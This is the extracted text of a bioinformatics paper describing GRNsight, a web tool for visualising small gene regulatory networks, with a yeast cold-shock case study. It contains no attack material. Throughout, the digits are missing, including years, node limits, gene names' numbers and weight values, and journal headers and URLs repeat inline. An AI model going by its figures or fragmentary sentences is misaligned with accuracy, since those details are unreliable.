finally, we wanted to minimize any startup, onboarding, or overhead time, which necessitated also enumerating a set of process requirements that would lead us to our goal. 
our project should: � follow best practices for open software development in bioinformatics, including: reusing code, releasing early and often to a public repository, tracking requirements, issues, and bugs, performing unit-tests, and providing both code and user documentation (schultheiss, ; prli�c & procter, ; wilson et al., ); � leverage the expertise of the faculty and undergraduate student development team members and be responsive to our grnmap customers (i.e., eat our own dog food); � balance the needs of fulfilling our own use case with developing a tool of wider applicability to the scientific community during a development cycle that ebbs and flows with the pressures of the academic calendar. grnsight both fulfills our stated product requirements and serves as a model for best practices for software development in bioinformatics as discussed in the sections below. materials and methods input data grnsight automatically lays out the network graph specified by an adjacency matrix contained within a worksheet named “network” or “network_optimized_weights” in a microsoft excel workbook (.xlsx). it was designed to accept workbooks seamlessly from the matlab grn modeling program, grnmap; however, the expected input format is general and is not dependent on grnmap. detailed documentation for the expected input file format is found on the grnsight documentation page: http://dondi.github.io/ grnsight/documentation.html. grnsight can automatically lay out either an unweighted or weighted network graph specified by an adjacency matrix where regulators are named in the columns and target dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://gephi.org/users/supported-graph-formats/csv-format/ http://onethingwell.org/post/ /about-one-thing-well http://dondi.github.io/grnsight/documentation.html http://dondi.github.io/grnsight/documentation.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ genes in the rows. note that regulators (regulatory transcription factors) are themselves encoded by genes and will be referred to as such. the adjacency matrix can be either symmetric (with the exact same genes named in both the columns and rows) or asymmetric (additional genes in either the columns or rows or both). for an unweighted network, each cell in the matrix should contain a “ ” if there is no regulatory relationship between the regulator and target, or a “ ” if there is a regulatory relationship between them (fig. ). in a weighted network, the “ ’s” are replaced with a real number that is the weight parameter (fig. ). positive weights indicate activation of the target gene by the regulator, and negative weights indicate repression of the target gene by the regulator. after having implemented the core functionality of seamlessly reading grnmap- generated excel workbooks, we recently extended the ability of grnsight to read other commonly used network data formats to increase the interoperability of grnsight with other network analysis and visualization software. grnsight can import and display simple interaction format (sif, .sif, http://manual.cytoscape.org/en/latest/ supported_network_file_formats.html#sif-format) and graphml (.graphml; brandes et al., ; http://graphml.graphdrawing.org/) files and export network data in those two formats (see the grnsight documentation page for details of the implementation at http://dondi.github.io/grnsight/documentation.html). grnsight is designed to visualize small- to medium-scale grns, not the entire grn for an organism. 
the bounding box for display of the graph has a fixed size. currently, it is recommended that the user upload networks with no more than unique genes (nodes) or edges. a warning is given upon upload of a network with – nodes or – edges, although the network graph will still display. if the user attempts to upload a network of or more nodes or or more edges, the graph does not display, and an error message will be returned. architecture grnsight has a service-oriented architecture, consisting of separate server and web client components (fig. ). the server provides a web application programming interface (api) that accepts a microsoft excel workbook (.xlsx) file via a postrequest and converts it into a corresponding javascript object notation (json) representation. conversion is accomplished by first parsing the .xlsx file using the node-xlsx library (https://github. com/mgcrea/node-xlsx) then mapping the translated worksheet cells into json. it also provides demonstration graphs already in this json format, without requiring a spreadsheet upload. the web client provides a graphical user interface for visualizing the json graphs returned by the server, whether the graphs are parsed from uploaded excel workbooks or returned directly by the server’s demos. as an additional layer of customization, the graphical interface provided by the web client can be embedded in any web page using the standard iframe element. this is the mechanism used in deploying the production and beta versions of the software on http://dondi.github.io/grnsight. figure illustrates this architecture and the interactions of the components. dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://manual.cytoscape.org/en/latest/supported_network_file_formats.html#sif-format http://manual.cytoscape.org/en/latest/supported_network_file_formats.html#sif-format http://graphml.graphdrawing.org/ http://dondi.github.io/grnsight/documentation.html https://github.com/mgcrea/node-xlsx https://github.com/mgcrea/node-xlsx http://dondi.github.io/grnsight http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ documentation for how grnsight is specifically deployed, including autonomous production and beta versions, can be found on the grnsight wiki (https://github.com/ dondi/grnsight/wiki/server-setup). figure screenshot of the expected format for an adjacency matrix for an unweighted network. regulators are named in the columns and target genes in the rows. a gene name at the top of the matrix will be considered the same as a gene name on the side if it contains the same text string, regardless of capitalization. the cells in the matrix contain a “ ” if there is no regulatory relationship between the regulator and target, or a “ ” if there is a regulatory relationship between them. this screenshot was generated from one of the demonstration files provided in the grnsight user interface, demo # : unweighted grn ( genes, edges), first discussed in dahlquist et al. ( ). figure screenshot of the expected format for an adjacency matrix for a weighted network. regulators are named in the columns and target genes in the rows. a gene name at the top of the matrix will be considered the same as a gene name on the side if it contains the same text string, regardless of capitalization. the cells in the matrix contain a “ ” if there is no regulatory relationship between the regulator and target. if there is a relationship, the weight parameter is provided as a real number. 
positive weights indicate activation of the target gene by the regulator, and negative weights indicate repression of the target gene by the regulator. this screenshot was generated from one of the demonstration files provided in the grnsight user interface, demo # : weighted grn ( genes, edges; schade et al., data), and displays weight parameters output by the grnmap modeling software, first discussed in dahlquist et al. ( ). dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/dondi/grnsight/wiki/server-setup https://github.com/dondi/grnsight/wiki/server-setup http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ grnsight is an open source project and is itself built using other open source software. server-side components are implemented with node.js and the express framework (brown, ). graph visualization is facilitated by the data-driven documents javascript library (d .js; bostock, ogievetsky & heer, ). d .js provides data mapping and layout routines which grnsight heavily customizes in order to achieve the desired graph visualization. the resulting graph is a scalable vector graphics (svg) drawing in which d .js maps gene objects from the json representation provided by the web api server onto labeled rectangles. edge weights are mapped into bezier curves. the resulting graph is interactive, initially using d .js’s force graph layout algorithm to automatically determine the positions of the gene rectangles. the user can then drag the rectangles to improve the graph’s layout. customizations to the graph display are described further in the next section. as noted in the introduction, we decided to create our own grnsight software instead of utilizing prior existing network visualization packages, like cytoscape (shannon et al., ; smoot et al., ). however, in keeping with open source development practices, we did leverage other pre-existing code as described above. besides d .js, cytoscape.js (franz et al., ) has been developed as an open source network visualization engine. the biojs registry (yachdav et al., ) also lists a dozen components tagged with the keyword “network.” the choice of d .js as the visualization engine was made simply to leverage the expertise of one of the co-authors who was already familiar with the d .js library in order to minimize the startup, onboarding, and overhead time for the project, which initially served as a semester-long capstone experience for one of the undergraduate co-authors. graph customizations grnsight’s diagrams are based on d .js’s force graph layout algorithm (bostock, ogievetsky & heer, ), which was then extensively customized to support the specific needs of biologists grnsight web api server grnsight web application server embedded graphical user interface web browser host web page gui resources graph in json format excel, sif, graphml open/import cycle export cycle sif, graphml graph in json format figure grnsight architecture and component interactions. the server provides a web api that accepts files in microsoft excel workbook (.xlsx), sif (.sif), and graphml (.graphml) formats and converts them into a unified json representation. a converse import function accepts this json representation and converts it into either sif (.sif) or graphml (.graphml) formats. the web appli- cation server provides code and resources for the graphical user interface that displays this json representation of the graph. dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ for grn visualization. d .js’s baseline force graph implementation had round, unlabeled nodes and undirected, straight-line edges. the following customizations were made for the nodes: (a) the nodes were made rectangular; (b) a label of up to characters was added; (c) node size was varied, depending on the size of the label. customizations were also made for the edges. instead of undirected, straight line segments, the edges display as directed edges. they are implemented as bezier curves that straighten when nodes are close together and curve when nodes are far apart. a special case was added to form a looping edge if a node regulated itself. when an unweighted adjacency matrix is uploaded, all edges are displayed as black with pointed arrowheads. when a weighted adjacency matrix is uploaded, edges are further customized based on the sign and magnitude of the weight parameter. as is common practice in biological pathway diagrams (gostner et al., ), activation (for positive weights) is represented by pointed arrowheads, and repression (for negative weights) is represented by a blunt end marker, i.e., a line segment perpendicular to the edge. the thickness of the edge also varies based on the magnitude of the absolute value of the weight. larger magnitudes have thicker edges and smaller magnitudes have thinner edges. the way that grnsight determines the edge thickness is as follows: grnsight divides all weight values by the absolute value of the maximum weight in the adjacency matrix to normalize all the values to between zero and one. grnsight then adjusts the thickness of the lines to vary continuously from the minimum thickness (for normalized weights near zero) to maximum thickness (normalized weight of one). the color of the edge also imparts information about the regulatory relationship. edges with positive normalized weight values from . to are colored magenta; edges with negative normalized weight values from - . to - are colored cyan. edges with normalized weight values between - . and . are colored grey to emphasize that their normalized magnitude is near zero and that they have a weak influence on the target gene. when a user mouses over an edge, the numerical value of the weight parameter is displayed. when the user drags nodes to customize his or her view of the network, edges adapt their anchor points to the movements of the nodes. user interface the grnsight user interface includes a menu/status bar and sliders that adjust d .js’s force graph layout parameters. figure provides an annotated screenshot of the user interface, highlighting its primary features. users can move force graph parameter sliders to refine the automated visualization. nodes have a charge, which repels or attracts other nodes. the charge distance determines at what range a node’s charge will affect other nodes. the link distance determines the minimum distance maintained between nodes. gravity determines the strength of the force drawing the nodes to the center of the graph. sliders can be locked to prevent changes and also reset to default values. graph visualizations can also be modified through manual node dragging. design decisions for the user interface were driven by applicable interaction design guidelines and principles (nielsen, ; shneiderman et al., ; norman, ) in alignment with the mental model and expectations of the target user base, consisting primarily of biologists, both novice and experienced. dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ test-driven development grnsight follows an open development model with rigorous documentation of requirements and issues on github. we have implemented an exhaustive unit testing framework using mocha (https://mochajs.org) and the chai assertion library (http:// chaijs.com) to perform test-driven development where unit tests are written before new functionality is coded (martin, ). this framework consists of around automated unit tests that examine nearly test files to ensure that the program is running as expected. table shows the test suite’s coverage report, as generated by istanbul (https:// gotwarlost.github.io/istanbul/). error and warning messages have a three-part framework that informs the user what happened, the source of the problem, and possible solutions. this structure follows the alert elements recommended by user interface guideline documents such as the os x human interface guidelines (https://developer.apple.com/library/mac/documentation/ userexperience/conceptual/osxhiguidelines/windowalerts.html). for example, grnsight returns an error when the spreadsheet is formatted incorrectly or the maximum number of nodes or edges is exceeded. the file menu includes commands for uploading an adjacency matrix in microsoft excel (.xlsx) and other formats. the demo menu lists four grns that have been preloaded into the server. the status display shows the and edge counts. force graph parameters can be adjusted, locked, or reset using this panel. some commands are also available in the format menu. figure annotated screenshot of the grnsight user interface. dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://mochajs.org http://chaijs.com http://chaijs.com https://gotwarlost.github.io/istanbul/ https://gotwarlost.github.io/istanbul/ https://developer.apple.com/library/mac/documentation/userexperience/conceptual/osxhiguidelines/windowalerts.html https://developer.apple.com/library/mac/documentation/userexperience/conceptual/osxhiguidelines/windowalerts.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ availability grnsight (currently version . . ) is available at http://dondi.github.io/grnsight/ and is compatible with google chrome version . . . or higher and mozilla firefox version . . or higher on the windows and mac os x operating systems. the website is free and open to all users, and there is no login requirement. website content is available under the creative commons attribution non-commercial share alike . unported license. grnsight code is available under the open source bsd license from our github repository https://github.com/dondi/grnsight. every user’s submitted data are private and not viewable by anyone other than the user. uploaded data reside as temporary files and are deleted from the grnsight server during standard operating system file cleanup procedures. a google analytics page view counter was implemented on september , and a file upload counter was added on april . from these start dates and as of august , the grnsight home page has been accessed , times, and , files have been uploaded and viewed with grnsight. of these , files, an estimated were uploaded by users outside of our group. results and discussion we have successfully implemented grnsight, a web application and service for visualizing small- to medium-scale grns, fulfilling our five requirements: . it exists as a web application without the need to download and install specialized software; . 
it is simple and intuitive to use; . it accepts an input file in microsoft excel format (.xlsx), as well as sif (.sif) and graphml (.graphml); . it reads a weighted or unweighted adjacency matrix where the regulatory transcription factors are in columns and the target genes are in rows (excel format only); . it automatically lays out and displays small- to medium-scale, unweighted and weighted, directed network graphs in a way that is familiar to biologists, adding value to the interpretation of the modeling results. grnsight facilitates interpretation of grn model results grnsight facilitates the biological interpretation of unweighted and weighted grn graphs.
table grnsight test suite code coverage summary. denominators represent the number of aspects of each type detected by istanbul in the grnsight codebase; numerators represent the subset of these which were executed by unit test code.
aspect of the code    test coverage (percent)
statements            / ( . %)
branches              / ( . %)
functions             / ( . %)
lines                 / ( . %)
our discussion focuses on two of the demonstration files provided in the user interface, demo # : unweighted grn ( genes, edges) and demo # : weighted grn ( genes, edges; schade et al., data). these two files describe grns from budding yeast, saccharomyces cerevisiae, correspond to supplementary data published by dahlquist et al. ( ), and when displayed by grnsight, represent interactive versions of figs. and of that paper, respectively. figure gives a side-by-side view of the same adjacency matrices laid out by grnsight and by hand. figures a–c are derived from demo # : unweighted grn ( genes, edges), and figs. d–f are derived from demo # : weighted grn ( genes, edges; schade et al., data). figures a and d show examples of the automatic layout performed by grnsight. figures c and f show the same adjacency matrices laid out by hand in adobe illustrator, corresponding to figs. and of dahlquist et al. ( ), respectively. figures b and e started with the automatic layout from grnsight and then were manually manipulated from within grnsight to lay them out similarly to figs. c and f, respectively.
figure side-by-side comparison of the same adjacency matrices laid out by grnsight and by hand. (a) grnsight automatic layout of the demonstration file, demo # : unweighted grn ( genes, edges); (b) graph from (a) manually manipulated from within grnsight; (c) the same adjacency matrix from (a) and (b) laid out entirely by hand in adobe illustrator, corresponding to fig. of dahlquist et al. ( ); (d) grnsight automatic layout of the demonstration file, demo # : weighted grn ( genes, edges; schade et al., data); (e) graph from (d) manually manipulated from within grnsight; (f) the same adjacency matrix from (d) and (e) laid out entirely by hand in adobe illustrator, corresponding to fig. of dahlquist et al. ( ). the nodes in (f) are colored in the style of genmapp (salomonis et al., ), based on the time course of expression of that gene in the schade et al. ( ) microarray data (stripes from left to right, , , and minutes of cold shock, with magenta representing a significant increase in expression relative to the control at time zero, cyan representing a significant decrease in expression relative to the control, and grey representing no significant change in expression relative to the control).
the use of grnsight represents a substantial time savings compared to creating the same figures entirely by hand and allows the user to try multiple arrangements of the nodes quickly and easily. note that this type of "by hand" manipulation of graphs is most useful for small- to medium-scale networks, the kind that grnsight is designed to display, and would not be appropriate for large networks. viewing the unweighted network (figs. a–c) allows one to make observations about the network structure (dahlquist et al., ). for example, yap has the highest in-degree, being regulated by six other transcription factors. rap has the highest out-degree of five, regulating four other transcription factors and itself. four genes, aft , nrg , rap , and yap , regulate themselves. many of the transcription factors are involved in regulatory chains, with the longest including five nodes originating at skn or ace . there are several other four-node chains that originate at cin , mac , phd , skn , and yap . finally, there are two rather complex feedforward motifs involving cin , rox , and yap and skn , yap , and rox (dahlquist et al., ). the networks with colored edges (figs. d–f) display the results of a mathematical model, where the expression levels of the individual transcription factors were modeled using mass balance ordinary differential equations with a sigmoidal production function and linear degradation (dahlquist et al., ). each equation in the model included a production rate, a degradation rate, weights that denote the magnitude and type of influence of the connected transcription factors (activation or repression), and a threshold of expression. the differential equation model was fit to published yeast cold shock microarray data from schade et al. ( ) using a penalized nonlinear least squares approach. the visualization produced by grnsight is displaying the results of the optimized weight parameters. positive weights (> 0) represent an activation relationship and are shown by pointed arrowheads. one example is that cin activates the expression of msn . negative weights (< 0) represent a repression relationship and are shown by a blunt arrowhead. one example is that abf represses the expression of msn . the thicknesses of the edges also vary based on the magnitude of the absolute value of the weight, with larger magnitudes having thicker edges and smaller magnitudes having thinner edges. in figs.
d– f, the edge corresponding to the repression of the expression of msn by abf stands out as the thickest because the absolute value of its weight parameter (- . ) has the largest magnitude out of all the weights (dahlquist et al., ). it is noticeable that none of the edges that represent activation are as thick as the abf -to- msn edge; only rap -to-rph and hal -to-msn are close with weights of . and . , respectively. the color of the edge also imparts information about the regulatory relationship. edges with positive normalized weight values from . to are colored magenta ( edges in this example); edges with negative normalized weight values from - . to - are colored cyan ( edges in this example). edges with normalized weight values between - . and . are colored grey to indicate that their normalized magnitude is near zero and that they have a weak influence on the target gene (five edges in this example). the grey color de-emphasizes the weak relationships to the eye, thus emphasizing the stronger colored relationships. dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ because of this visualization of the weight parameters, one can make some interesting observations about the behavior of the network (dahlquist et al., ). taking the arrowhead type, thickness, and color into consideration, one can, by visual inspection, group edges by type and relative influence into four activation and four repression bins. rap -to-rph , hal -to-msn , and nrg to itself have the strongest activation relationships, followed by rap -to-msn and cin -to-msn , followed by nrg -to-yap , msn -to-fhl , skn -to-rox and phd -to-msn , followed by abf -to-fhl as the weakest of the activation relationships. the aforementioned abf -to-msn edge has the strongest repression relationship, followed by ace -to-yap , rap -to-hsf , cin -to-rox , aft to itself, and rap to itself, followed by rox -to-yap , phd -to-cup , cin -to-yap , yap -to-rox , yap -to-rox , skn -to-yap , rap -to-aft , and yap to itself, followed by mac -to-cup and skn -to-nrg as the weakest of the repression relationships. these rankings could have been obtained, of course, by sorting the numerical values of the edges in a table, but it is notable that these groupings can also be picked out by eye and then put into the context of the other network connections. because the five weakest connections, cup -to-yap , reb -to-gts , yap -to-cin , yap -to-yap , and hsf -to-reb , colored grey, are de-emphasized in the visual display, a different interpretation of the network structure can be made as compared to the unweighted network (figs. e and f vs. figs. b and c). in most cases, nodes in a regulatory chain “drop out” visually “breaking” the chain. for example, in the four-node chain beginning with rap -to-hsf , the last two nodes, reb and gts , are only weakly connected. in the five-node chains beginning with skn -to-yap or ace -to-yap , and the four-node chains beginning with mac -to-cup or phd -to-cup , the nodes connected to yap drop out (yap -to-yap , yap -to-cin , and cup -to-yap ). this suggests that regulatory chains may only be effective to a depth of two levels, and that while longer chains are theoretically possible, given the network connections, they have a negligible effect on the dynamics of expression of downstream genes. 
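the mass balance model summarized in the preceding discussion can be written schematically as follows. this is only a generic sketch of an ordinary differential equation with a sigmoidal production term and linear degradation; the exact parameterization and fitting procedure used by grnmap and dahlquist et al. ( ) may differ in detail.

\frac{dx_i}{dt} = P_i \, \sigma\!\left(\sum_{j} w_{ij}\, x_j + b_i\right) - d_i\, x_i, \qquad \sigma(u) = \frac{1}{1 + e^{-u}},

where x_i is the expression level of gene i, P_i is a production rate, d_i is a degradation rate, w_{ij} is the weight describing the magnitude and type of influence of regulator j on target i (positive for activation, negative for repression), and b_i plays the role of the expression threshold.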
another interpretation of the network structure that is highlighted by the weighted display is that the -gene network can be divided into two smaller subnetworks by removing the two edges cup -to-yap (grey) and abf -to-fhl (thin magenta, weakly activating). while this could also be observed in the unweighted network, the application of the weight information, showing only thin connections between the two subnetworks, suggests that they could function relatively independently. finally, the unweighted display showed two complex feedforward motifs involving cin , rox , and yap and skn , yap , and rox . the weighted display reveals that the complexity of the connections is reduced because the weak yap -to-yap and yap -to-cin edges drop out. furthermore, the display shows that the modeling predicts that the three- node cin -rox -yap motif is an incoherent type feedforward loop, while the skn - yap -rox motif is a coherent type feedforward loop, neither of which is found very commonly in escherichia coli nor s. cerevisiae grns (alon, ). the modeling combined with the display suggests that further investigation is warranted: either these two rare types of feedforward loops are important to the dynamics of this particular grn, dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ or the network structure is incorrect. in either case, future lines of experimental investigation are suggested to the user. when examining individual genes in the network, one can see that the expression of several genes is controlled by a balance of activation and repression by different regulators. for example, the expression of msn is strongly activated by cin , but even more strongly repressed by abf . the expression of rox is weakly activated by skn and weakly repressed by yap , cin , and yap . the expression of yap is weakly activated by nrg , but weakly repressed by itself, cin , and rox . furthermore, some transcription factors act both as activators of some targets and repressors of other targets. for example, rap activates the expression of msn and rph , but represses the expression of aft , hsf , and itself. phd , abf , cin , and skn also both activate and repress their different target genes in the network. for each of these regulators, there is experimental evidence to support their opposite effects on gene expression, although not necessarily for these particular target genes (rap : shore & nasmyth, ; phd : borneman et al., , abf : buchman & kornberg, and miyake et al., ; cin and skn : ni et al., ). except for cin , what these genes have in common is that they themselves have no inputs in the network. the remaining no-input genes (ace , mac , and hal ) have only one outgoing edge in this network. because these genes have no inputs and, in some sense, have been artificially disconnected from the larger grn of the cell, one must not overinterpret the results of the modeling for these genes. thus, grnsight enables one to interpret the weight parameters more easily than one could from the adjacency matrix alone. visual inspection has long been recognized by experts such as tufte ( ) and card, mackinlay & shneiderman ( ) as distinct from other forms of purely numeric, computational, or algorithmic data analysis, and as the preceding discussion highlights, it is this potential that can be derived specifically by visual inspection that is enabled by grnsight. 
card, mackinlay & shneiderman ( ) have identified six major ways, documented in earlier literature and empirical studies, by which information visualization amplifies cognition. tufte’s ( ) seminal book perhaps states it best: “graphics reveal data. indeed graphics can be more precise and revealing than conventional statistical computations.” note that the nodes in fig. f are also colored in the style of genmapp (salomonis et al., ), based on the time course of expression of that gene in the schade et al. ( ) microarray data (stripes from left to right, , , and min of cold shock, with magenta representing a significant increase in expression relative to the control at time zero, cyan representing a significant decrease in expression relative to the control, and grey representing nosignificant changein expression relative to thecontrol).thisfeaturehas not yet been implemented in grnsight, but is currently under development for version . these observations made by direct inspection of the grnsight graph are for a relatively small grn of genes and edges and become more difficult as nodes and edges are added. for much larger networks, a more powerful graph analysis tool such as cytoscape (shannon et al., ; smoot et al., ) or gephi (bastian, heymann & jacomy, ) is warranted. however, for small networks in the range of – nodes, grnsight dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fulfills a need to quickly and easily view and manipulate them. the grn modeled in dahlquist et al. ( ) and displayed in fig. was derived from the lee et al. ( ) and harbison et al. ( ) datasets generated by chromatin immunoprecipitation followed by microarray analysis. we have also used grnsight to display grns derived from the yeastract database (teixeira et al., ), whose own display tool is static, displaying regulators and targets in two rows. instructions for viewing yeastract-derived grns can be found on the grnsight documentation page. while grnsight was designed originally for viewing grns, it is not specific for any particular species, nor for that kind of data. as long as the text strings used as identifiers for the “regulators” and “targets” match, it can be used to visualize any small, unweighted or weighted network with directed edges for systems biology or other application domains. grnsight development follows best practices for scientific computing and fair data principles veretnik, fink & bourne ( ) lament and schultheiss et al. ( ) document that some computational biology resources, especially web servers, lack persistence and usability, leading to an inability to reproduce results. with that in mind, we have consciously followed best practices for open development (prli�c & procter, ), scientific computing (wilson et al., ), providing a web resource (schultheiss, ), and fair data (wilkinson et al., ), simultaneously following and teaching these practices to the primary developers who were all undergraduates. each of these practices relates to each other, supporting reproducible research. open development and long-term persistence as noted in our process requirements in the introduction, we have followed an open development model since the project’s inception in january , with our code available under the open source bsd license at the public github repository, where we “release early, release often” (torvalds in raymond ( )) and also track requirements, issues, and bugs. 
indeed, our project stands on the shoulders of other open source tools. our unit-testing framework provides confidence that the code works as expected. detailed documentation for users (web page) and developers (wiki) are provided. demo data are also provided so users have both an example of how to format input files and can see how the software should perform. as noted by prli�c & procter ( ), open development practices have a positive impact on the long-term sustainability of a project. furthermore, schultheiss et al. ( ) describe twelve qualities for evaluating web services that sum to a long-term-score, which correlates with persistence of the web service. grnsight complies with all requirements, providing: a stable web address (using the github.io domain to host the website and amazon cloud services to host the server help to ensure long-term availability), version information, hosting country and institution, last updated date, contact information, high usability, no registration requirement, no download required, example data, fair testing possibility (both with demonstration excel workbooks and standard sif and graphml file types), and a functional service. dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we are committed to continue development of the grnsight resource, fixing bugs and improving the software by adding features. the lead authors (dahlquist, dionisio, and fitzpatrick) are all tenured faculty, overseeing the design, code, testing, and documentation of grnsight and providing continuity to the project. together we have mentored the undergraduates (anguiano, varshneya, southwick, and samdarshi) who had primary responsibility for coding, testing, and documentation, while also being full partners in the design of the software. a pipeline has been established for onboarding new members to the project, also providing continuity. lawlor & walsh ( ) detail some of the same issues of reliability and reproducibility in bioinformatics software referred to by wilson et al. ( ). lawlor & walsh ( ) conclude that the ideal way to bring software engineering values into bioinformatics research projects is to establish separate specialists in bioinformatics engineering. we disagree. through grnsight, we have shown how best practices can be taught to undergraduates concomitant with training in bioinformatics, as we have shown previously with master’s level students (dionisio & dahlquist, ). fair data principles the fair guiding principles for scientific data and stewardship state that data should be findable, accessible, interoperable, and reusable by both humans and machines (wilkinson et al., ), with “data” loosely construed as any scholarly digital research object, including software. as scientific software that interacts with data, the fair principles can apply to both the grnsight application and the network data it is used to visualize. thus, we evaluate the grnsight project in terms of its “fairness” below. findable the findable principle states that metadata and data should have a globally unique and persistent identifier, and that metadata and data should be registered or indexed in a searchable resource (wilkinson et al., ). in terms of software, the identifier is the name and version. because we utilize the github release mechanism, grnsight code is tagged with a version (currently v . . ) and each version is available from the release page (https://github.com/dondi/grnsight/releases). 
we have registered grnsight with well- known bioinformatics tools registries: the biojs repository (yachdav et al., ; http:// biojs.io/), the elixir tools and data services registry (ison et al., ; https://bio.tools/), bioinformatics.org (http://www.bioinformatics.org/wiki/), and the links directory at bioinformatics.ca (brazas, yamada & ouellette, ; https://bioinformatics.ca/links_ directory/), as well as node package manager (npm, https://www.npmjs.com/). grnsight has also been presented at scientific conferences, with slides and posters available via slideshare (http://www.slideshare.net/grnsight) and with a recent talk and poster at the bioinformatics open source conference available via f research (dahlquist et al., a; dahlquist et al., b). we have paid special attention to the metadata associated with our website to increase its findability via google search. and, of course, with the publication of this article, grnsight is findable in literature databases. in the everyday sense of the word “findable,” one could argue that by being “yet another” dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/dondi/grnsight/releases http://biojs.io/ http://biojs.io/ https://bio.tools/ http://www.bioinformatics.org/wiki/ https://bioinformatics.ca/links_directory/ https://bioinformatics.ca/links_directory/ https://www.npmjs.com/ http://www.slideshare.net/grnsight http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ network visualization tool in a crowded domain (recall other tools recorded by pavlopoulos et al. ( )), grnsight is contributing to a findability problem for users in the sense that it contributes more “hay” to the “needle in a haystack” problem of finding the right tool for the job. however, we hope that by the actions we have taken and the specificity of our requirements for grnsight’s functionality, publicly describing both what we mean it to be and what we do not mean it to be, the benefits of adding grnsight to the diverse pool of network visualization software outweighs the detriments. in addition, the findable principle states that data should be described with rich metadata and that metadata should include the identifier of the data it describes (wilkinson et al., ). because grnsight does not interact directly with a data repository, it is up to individual users to make sure that their data is fair compliant with the findable principle. this is discussed further below with regard to interoperability and reusability. accessible the accessible principle states that metadata and data should be retrievable by their identifier using a standardized communication protocol, that the protocol is open, free, and universally implementable, that the protocol allows for authentication and authorization procedures, where necessary, and that metadata are accessible, even when the data are no longer available (wilkinson et al., ). as noted before, grnsight meets the first two criteria, because it is free and open to all users, and there is no login requirement. the source code is available under the open source bsd license and can be npm installed (given the caveat that the user must be able to support the grnsight client-server setup). the longevity of grnsight is partially tied to the longevity of the github repository itself, although the authors maintain local backups. again, because grnsight does not interact directly with a data repository, it is up to individual users to make sure that their data is fair compliant with the accessible principle. 
since grnsight does not have any security procedures nor authentication requirements (e.g., password protection; user registration), it is not recommended that sensitive data be uploaded to our grnsight server. however, users who wish to visualize sensitive data could run a local instance of the grnsight client-server setup. interoperable as software, grnsight does not interact directly with other databases or software, as, for example, cytoscape does with many pathway and molecular interaction databases or individual cytoscape apps (formerly plugins; saito et al., ), so it is not interoperable in that sense. the grnsight web application is designed to interact directly with a human user and is not set up to import or export data programmatically, as would be necessary to incorporate it into popular workflow environments like galaxy (afgan et al., ) or be hosted by a tool aggregator such as qubes hub (quantitative undergraduate biology education and synthesis hub, https://qubeshub.org/). however, grnsight is interoperable in the sense that via the user, it can receive and pass data from and to other programs. in this latter sense, this section could just as easily have been entitled, “ % of dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://qubeshub.org/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bioinformatics is getting your data into the right file format.” indeed, one of the original motivations and requirements for grnsight was to seamlessly read and display weighted grns that were output as excel workbooks from the grnmap matlab modeling package (dahlquist et al., ; http://kdahlquist.github.io/grnmap/). this specialized use case is augmented by grnsights’s ability to import and export data in the commonly used sif (http://manual.cytoscape.org/en/latest/supported_network_file_formats. html#sif-format) and graphml (brandes et al., ; http://graphml.graphdrawing.org/) formats, facilitating movement of data between grnsight and other network visualization and analysis programs. for instance, one can interact with the grnsight server component directly, in order to upload excel workbooks and supported import formats for conversion into json then back into a supported export format. thus, we are in a position to comment on sif and graphml with respect to the finer points of data interoperability, including: metadata and data using a formal, accessible, shared, and broadly applicable language for knowledge representation, metadata and data using vocabularies that follow the fair principles, and metadata and data including qualified references to other metadata and data (wilkinson et al., ). when we implemented import and export for the sif and graphml formats, we encountered issues due to the variations accepted by these formats which required design decisions that may, in turn, restrict compatibility with other software that we did not test. for example, the sif format as described in the documentation for cytoscape v . . offers quite a few divergent options, including choice of delimiter (space vs. tab), denoting a pairwise list of interactions versus concatenating all the interactions to the same node on the same line, and the choice of relationship type (any string). it only requires node identifiers to be internally consistent to the file, without enforcing the use of ids from a recognized biological database. 
while grnsight strives to read any sif file, we restricted our export format to tab-delimited, pairwise interactions, and a single relationship type (“pd” for “protein / dna”) for unweighted networks. for weighted networks, grnsight exports the weight value as the relationship type. the advantage of sif is that it is a simple text format; the main disadvantage is that all it is really intended to encode is the interaction between two nodes, which makes including the weight data as grnsight does a kludge, and including metadata impossible. moreover, there is no controlled vocabulary for the relationship type, only a list of suggestions in the cytoscape documentation, from which we selected “pd.” in practice, cytoscape v . . defaults to “interacts with” as the relationship type when exporting sif files. as a simple text format, it does not satisfy the three sub-principles of interoperability (wilkinson et al., ). in contrast, graphml, as a richer xml format, has the potential to satisfy the interoperability criteria. however, as with sif, we encountered issues because a feature of the format that is intended to facilitate flexibility has, in practice, turned out to degrade interoperability rather than enhance it. graphml standardizes only the representation of nodes and edges and their directions; all other characteristics, such as names, weights, and other values, are left for others to specify through a key element, which is not subject to a controlled vocabulary. although this flexibility is appreciated, it also serves as an enabler for divergence. in particular, two issues arose with interpreting the node dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://kdahlquist.github.io/grnmap/ http://manual.cytoscape.org/en/latest/supported_network_file_formats.html#sif-format http://manual.cytoscape.org/en/latest/supported_network_file_formats.html#sif-format http://graphml.graphdrawing.org/ http://dx.doi.org/ . /peerj-cs. 